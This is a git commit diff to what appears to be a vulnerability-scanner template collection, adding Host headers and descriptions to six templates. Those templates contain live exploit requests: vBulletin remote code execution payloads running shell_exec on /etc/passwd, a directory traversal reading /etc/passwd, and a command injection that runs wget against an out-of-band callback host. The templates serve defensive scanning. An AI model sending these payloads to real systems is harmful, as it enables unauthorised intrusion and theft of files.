* Added Host headers where needed (validated via disclosures/posts)

* Added CVE simple-employee-rce.yaml
2021-09-30 12:52:05 -04:00 · 2021-09-30 12:52:05 -04:00 · 3878138bfe
parent e75b8dd660
commit 3878138bfe
6 changed files with 45 additions and 32 deletions
--- a/cves/2019/CVE-2019-16759.yaml
+++ b/cves/2019/CVE-2019-16759.yaml
@ -1,10 +1,10 @@
 id: CVE-2019-16759

 info:
-  name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
+  name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass
  author: madrobot
  severity: critical
-  reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
+  reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/
  tags: cve,cve2019,vbulletin,rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -17,6 +17,7 @@ requests:
  - raw:
      - |
        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
--- a/cves/2019/CVE-2019-17538.yaml
+++ b/cves/2019/CVE-2019-17538.yaml
@ -1,29 +1,30 @@
-id: CVE-2019-17538
-info:
-  name: Jnoj Directory Traversal for file reading(LFI)
-  author: pussycat0x
-  severity: high
-  reference: https://github.com/shi-yang/jnoj/issues/53
-  tags: cve,cve2019,jnoj,lfi
-
+id: CVE-2019-17538
+info:
+  name: Jnoj arbitrary local file inclusion (LFI)
+  author: pussycat0x
+  severity: high
+  reference: https://github.com/shi-yang/jnoj/issues/53
+  tags: cve,cve2019,jnoj,lfi
+
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2019-17538
    cwe-id: CWE-22
-  description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring."
-requests:
-  - raw:
-      - |
-        GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
-        Content-Type: application/x-www-form-urlencoded
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+  description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../"
+requests:
+  - raw:
+      - |
+        GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
--- a/cves/2020/CVE-2020-17496.yaml
+++ b/cves/2020/CVE-2020-17496.yaml
@ -5,7 +5,7 @@ info:
  severity: critical
  reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
  description: |
-    vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
+    vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
  tags: cve,cve2020,vbulletin,rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -17,6 +17,7 @@ requests:
  - raw:
      - |
        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
@ -29,4 +30,4 @@ requests:

      - type: status
        status:
-          - 200
+          - 200
--- a/misconfiguration/put-method-enabled.yaml
+++ b/misconfiguration/put-method-enabled.yaml
@ -5,18 +5,21 @@ info:
  author: xElkomy
  severity: high
  reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+  description: The PUT method is enabled on the web server, allowing for arbitrary file uploads.
  tags: injection

 requests:
  - raw:
      - |
        PUT /testing-put.txt HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: text/plain

        {{randstr}}

      - |
        GET /testing-put.txt HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: text/plain

    req-condition: true
--- a/vulnerabilities/other/mirai-unknown-rce.yaml
+++ b/vulnerabilities/other/mirai-unknown-rce.yaml
@ -13,6 +13,7 @@ requests:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        key=';`wget http://{{interactsh-url}}`;#
--- a/vulnerabilities/other/simple-employee-rce.yaml
+++ b/vulnerabilities/other/simple-employee-rce.yaml
@ -1,11 +1,17 @@
-id: simple-employee-rce
+id: CVE-2019-20183

 info:
-  name: Simple Employee Records System 1.0 RCE
+  name: Simple Employee Records System 1.0 arbitrary file upload
+  description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE.
  author: pikpikcu
-  severity: critical
+  severity: high
  reference: https://www.exploit-db.com/exploits/49596
-  tags: rce,intrusive
+  classification:
+    cvess-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cwe-id: CWE-434
+    cve-id: CVE-2019-20183
+  tags: rce,intrusive,cve,upload,cve2019

 requests:
  - raw: